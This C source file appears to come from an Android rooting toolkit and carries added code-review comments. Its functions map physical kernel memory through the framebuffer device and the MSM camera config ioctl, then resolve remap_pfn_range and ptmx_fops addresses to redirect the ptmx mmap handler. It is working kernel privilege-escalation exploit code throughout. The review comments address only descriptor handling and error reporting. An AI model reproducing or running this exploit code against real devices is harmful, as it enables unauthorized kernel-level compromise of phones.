/*
 * Map a window of physical memory into this process through the framebuffer
 * device node.
 *
 * fd: out-parameter; receives the descriptor returned by open(FB_DEVICE).
 *     It is only written once the physical-address parameters are known, so
 *     on the first early return below it is left untouched.
 *
 * Returns the address returned by mmap(), or MAP_FAILED when the physical
 * parameters cannot be determined, the device cannot be opened, or the
 * FBIOGET_FSCREENINFO ioctl fails.
 *
 * NOTE(review): the mmap() result is returned unchecked. When mmap() itself
 * fails, *fd is still open and the caller receives MAP_FAILED with no
 * indication that it owns a descriptor that must be closed. Every other
 * failure path here closes the descriptor (or never opened it), so this is
 * the one inconsistent exit.
 */
void * fb_mem_mmap(int *fd)
{
    struct fb_fix_screeninfo info;
    void *mapped_address;

    /* Both the offset and the detection fallback are provided elsewhere in
     * this file; the mapping below is only meaningful once one of them has
     * supplied the physical base. */
    if (!kernel_phys_offset_initialized && !detect_kernel_phys_parameters()) {
        ALOGI("This machine can not use fb_mem exploit.\n");
        return MAP_FAILED;
    }

    /* Success depends on the caller having read/write access to FB_DEVICE;
     * a permission failure surfaces here via errno. */
    *fd = open(FB_DEVICE, O_RDWR);
    if (*fd < 0) {
        ALOGI("Failed to open " FB_DEVICE " due to %s\n", strerror(errno));
        return MAP_FAILED;
    }

    /* info.smem_len (the framebuffer memory length) is the only field used;
     * it is added to the file offset passed to mmap() below. */
    if (ioctl(*fd, FBIOGET_FSCREENINFO, (void *)&info) != 0) {
        ALOGI("Failed to get screen info due to %s\n", strerror(errno));
        close(*fd);
        return MAP_FAILED;
    }

    /* Fixed mapping at MAPPED_BASE. The length is 4 GiB minus the physical
     * base (the 0x100000000 literal is wider than 32 bits, so the subtraction
     * is carried out in a 64-bit type even on a 32-bit build). The result is
     * not compared against MAP_FAILED -- see the note above. */
    mapped_address = mmap((void *)MAPPED_BASE,
                          (0x100000000 - kernel_phys_address),
                          PROT_READ|PROT_WRITE,
                          MAP_SHARED|MAP_FIXED,
                          *fd,
                          kernel_phys_address + info.smem_len);
    return mapped_address;
}
<br>/*
 * Map KERNEL_SIZE bytes of physical memory at MAPPED_BASE through the MSM
 * camera config device.
 *
 * fd_video:  out-parameter; receives the descriptor for /dev/video0.
 * fd_config: out-parameter; receives the descriptor for
 *            /dev/msm_camera/config0, which is the descriptor the mapping is
 *            created from.
 *
 * Returns the mmap() result on success. On any failure both descriptors that
 * were opened are closed and reset to -1, and MAP_FAILED is returned.
 *
 * NOTE(review): if the first open() fails, error_exit tests *fd_config before
 * this function has ever assigned it, so the `>= 0` check reads whatever the
 * caller passed in. That is only safe if every call site pre-initialises
 * *fd_config to -1 -- confirm at the callers; otherwise a stale positive
 * value would be close()d here.
 *
 * NOTE(review): this function reports via printf() while fb_mem_mmap() in the
 * same file uses ALOGI(); the open()/ioctl()/mmap() failures below are not
 * reported at all (no errno is logged).
 */
void * msm_cameraconfig_mmap(int *fd_video, int *fd_config)
{
    struct msm_mem_map_info args;
    void *mapped_address;

    if (!kernel_phys_offset_initialized && !detect_kernel_phys_parameters()) {
        printf("This machine can not use msm_cameraconfig exploit.\n");
        return MAP_FAILED;
    }

    *fd_video = open("/dev/video0", O_RDWR);
    if (*fd_video < 0) {
        goto error_exit;
    }

    *fd_config = open("/dev/msm_camera/config0", O_RDWR);
    if (*fd_config < 0) {
        goto error_exit;
    }

    /* Only these three members are assigned; any other members of
     * struct msm_mem_map_info are left uninitialised (the struct is not
     * zeroed) -- confirm the kernel side ignores them. */
    args.cookie = kernel_phys_offset;
    args.length = KERNEL_SIZE;
    args.mem_type = MSM_MEM_MMAP;
    if (ioctl(*fd_config, MSM_CAM_IOCTL_SET_MEM_MAP_INFO, &args) < 0) {
        goto error_exit;
    }

    /* Unlike fb_mem_mmap(), this mapping does not use MAP_FIXED, so the
     * kernel may honour MAPPED_BASE as a hint only; the caller receives
     * whatever address mmap() actually chose. */
    mapped_address = mmap((void *)MAPPED_BASE, KERNEL_SIZE,
                          PROT_READ | PROT_WRITE, MAP_SHARED,
                          *fd_config, kernel_phys_offset);
    if (mapped_address == MAP_FAILED) {
        goto error_exit;
    }

    return mapped_address;

error_exit:
    /* Close in reverse order of acquisition and hand back -1 so the caller
     * cannot double-close a descriptor this function already released. */
    if (*fd_config >= 0) {
        close(*fd_config);
        *fd_config = -1;
    }
    if (*fd_video >= 0) {
        close(*fd_video);
        *fd_video = -1;
    }
    return MAP_FAILED;
}
/*
 * Run `callback` against a kernel-memory mapping, trying the mmap-based
 * path first and falling back to the ptmx mmap path.
 *
 * callback: invoked (via run_callback_with_mmap) once a mapping is in place.
 *
 * Returns the callback's result when run_exploit_mmap() handles it, the
 * result of attempt_exploit() otherwise, or false when one of the required
 * addresses (remap_pfn_range, ptmx_fops mmap, kernel_physical_offset) could
 * not be resolved. Each unresolved prerequisite is reported on stdout.
 *
 * NOTE(review): the local `kernel_physical_offset` shares its name with the
 * identifier passed to DEVICE_SYMBOL(). If that macro stringifies or
 * token-pastes its argument this is harmless; if it expands to an
 * expression, the local would shadow it -- confirm against the macro's
 * definition.
 */
bool run_with_mmap(memory_callback_t callback)
{
    unsigned long int kernel_physical_offset;
    bool result;

    /* `result` is only meaningful when run_exploit_mmap() returns true; it
     * is read on that path alone. */
    if (run_exploit_mmap(callback, &result)) {
        return result;
    }

    /* The setup_* helpers populate the file-scope addresses tested below;
     * a null value after setup means the address is unknown for this device. */
    setup_remap_pfn_range_address();
    if (!remap_pfn_range) {
        printf("You need to manage to get remap_pfn_range addresses.\n");
        return false;
    }

    setup_ptmx_fops_mmap_address();
    if (!ptmx_fops_mmap_address) {
        printf("You need to manage to get ptmx_fops addresses.\n");
        return false;
    }

    /* Prefer the per-device symbol table; only probe the parameters at
     * runtime when no entry exists. The 0x00008000 adjustment is applied
     * only to the table value, not to the detected one -- presumably the
     * offset of the symbol relative to the physical base; confirm. */
    kernel_physical_offset = device_get_symbol_address(DEVICE_SYMBOL(kernel_physical_offset));
    if (kernel_physical_offset) {
        set_kernel_phys_offset(kernel_physical_offset - 0x00008000);
    } else if (!detect_kernel_phys_parameters()) {
        printf("You need to manage to get kernel_physical_offset addresses.\n");
        return false;
    }

    /* The third argument (0) and the address of ptmx_mmap are passed through
     * to attempt_exploit() unchanged; their interpretation lives there. */
    return attempt_exploit(ptmx_fops_mmap_address,
                           (unsigned long int)&ptmx_mmap,
                           0,
                           run_callback_with_mmap,
                           callback);
}